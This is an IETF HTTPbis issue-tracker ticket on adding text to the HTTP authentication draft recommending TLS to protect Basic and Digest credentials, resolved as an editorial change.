Opened 6 years ago

Closed 5 years ago

Last modified 5 years ago

#539 closed editorial (incorporated)

mention TLS vs plain text passwords or dict attacks?

Reported by: julian.reschke@… Owned by: draft-ietf-httpbis-p7-auth@…
Priority: normal Milestone: 26
Component: p7-auth Severity: In IESG Evaluation
Keywords: Cc:

Description

Sean Turner

1) So I guess the reason we're not saying TLS is an MTI with basic/digest is that that's getting done in an httpauth draft? It really wouldn't hurt to duplicate that while we're getting the other one done (I know you *don't* want a reference to that draft).


Stephen Farrell

Please check the secdir review. (​http://www.ietf.org/mail-archive/web/secdir/current/msg03491.html) I agree with the comment that this really should have some mention of using TLS to protect basic/digest, even if that ought also be elsewhere.

Attachments (1)

539.diff (1.7 KB) - added by julian.reschke@… 6 years ago.
Proposed change

Download all attachments as: .zip

Change History (7)

comment:1 Changed 6 years ago by julian.reschke@…

P7 currently does not attempt to discuss security considerations that would be specific to particular authentication schemes.

Basic and Digest are defined in RFC 2617, and already have these warnings in their Security Considerations. The same will be true for the replacement specs the HTTPAUTH WG is working on.

Thus I'd like to close this as WONTFIX.

comment:2 follow-up: Changed 6 years ago by fielding@…

It would make sense to have a general mention of using a secured connection (e.g., TLS) when using any form of authentication, regardless of auth-scheme. However, it would be incorrect to say that it is mandatory to implement; such requirements do not apply to HTTP/1.1.

comment:3 in reply to: ↑ 2 Changed 6 years ago by julian.reschke@…

Replying to fielding@…:

It would make sense to have a general mention of using a secured connection (e.g., TLS) when using any form of authentication, regardless of auth-scheme. However, it would be incorrect to say that it is mandatory to implement; such requirements do not apply to HTTP/1.1.

In the Introduction, I assume. Care to propose concrete text?

Last edited 6 years ago by julian.reschke@… (previous) (diff)

Changed 6 years ago by julian.reschke@…

Proposed change

comment:4 Changed 5 years ago by julian.reschke@…

From [2571]:

mention that the auth related header fields by default are sent unsecured and hint at TLS (see #539)

comment:5 Changed 5 years ago by julian.reschke@…

  • Resolution set to incorporated
  • Status changed from new to closed

comment:6 Changed 5 years ago by fielding@…

From [2573]:

(editorial) move and expand on discussion of confidentiality of credentials in its own security considerations section; see #539

Note: See TracTickets for help on using tickets.